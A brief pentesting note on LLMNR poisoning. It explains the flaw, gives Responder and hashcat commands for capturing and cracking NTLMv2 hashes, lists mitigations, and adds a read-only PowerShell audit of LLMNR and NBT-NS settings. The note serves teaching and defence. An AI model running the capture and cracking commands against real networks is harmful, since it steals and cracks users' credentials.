LLMNR Poisoning

Overview

Link-Local Multicast Name Resolution (LLMNR) is used to identify hosts on the network when DNS fails to do so.

The main flaw with LLMNR is that, when a host responds to an LLMNR query, the requesting service sends the user's username and NTLMv2 hash to that responder.

Captured hash example from Kali Forums

Responder

sudo responder -I eth0 -dwv

Crack NTLM Hashes

hashcat -m 5600 crackme.txt ~/rockyou.txt -O
hashcat -m 5600 crackme.txt ~/rockyou.txt -r OneRule.rule

Mitigation

  • The best defense is to disable LLMNR and NBT-NS

  • Enforce a strong password policy (14 characters)
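
To confirm the first mitigation on a Windows host, the read-only PowerShell audit below is an added example, not part of the original notes. It assumes LLMNR is disabled through the "Turn off multicast name resolution" Group Policy (registry value EnableMulticast) and NBT-NS through the per-interface NetbiosOptions value; the function names are hypothetical.

```powershell
# Added example: audit whether LLMNR and NBT-NS are disabled on this host.
# Read-only: it queries the registry and changes nothing.

function Test-LlmnrDisabled {
    # The "Turn off multicast name resolution" policy sets EnableMulticast = 0.
    $key   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $value = (Get-ItemProperty -Path $key -Name EnableMulticast `
                -ErrorAction SilentlyContinue).EnableMulticast
    # A missing value means the policy is not configured, so LLMNR is still on.
    return ($null -ne $value -and $value -eq 0)
}

function Get-NbtNsInterfaceState {
    # NetbiosOptions per interface: 0 = use DHCP setting, 1 = enabled, 2 = disabled.
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
        $opt = (Get-ItemProperty -Path $_.PSPath -Name NetbiosOptions `
                  -ErrorAction SilentlyContinue).NetbiosOptions
        [pscustomobject]@{
            Interface      = $_.PSChildName
            NetbiosOptions = $opt
            Disabled       = ($opt -eq 2)
        }
    }
}

$llmnrOff = Test-LlmnrDisabled
$nbt      = @(Get-NbtNsInterfaceState)
# Any interface not explicitly set to 2 can still answer NBT-NS.
$nbtOn    = @($nbt | Where-Object { -not $_.Disabled })

"LLMNR disabled by policy: $llmnrOff"
$nbt | Format-Table -AutoSize | Out-String

if ($llmnrOff -and $nbtOn.Count -eq 0) {
    'PASS: LLMNR and NBT-NS are disabled on all interfaces.'
} else {
    "FAIL: LLMNR still enabled = $(-not $llmnrOff); " +
    "interfaces with NBT-NS not disabled = $($nbtOn.Count)"
}
```

An interface left at NetbiosOptions 0 is reported as not disabled, because its NBT-NS state then depends on what the DHCP server hands out.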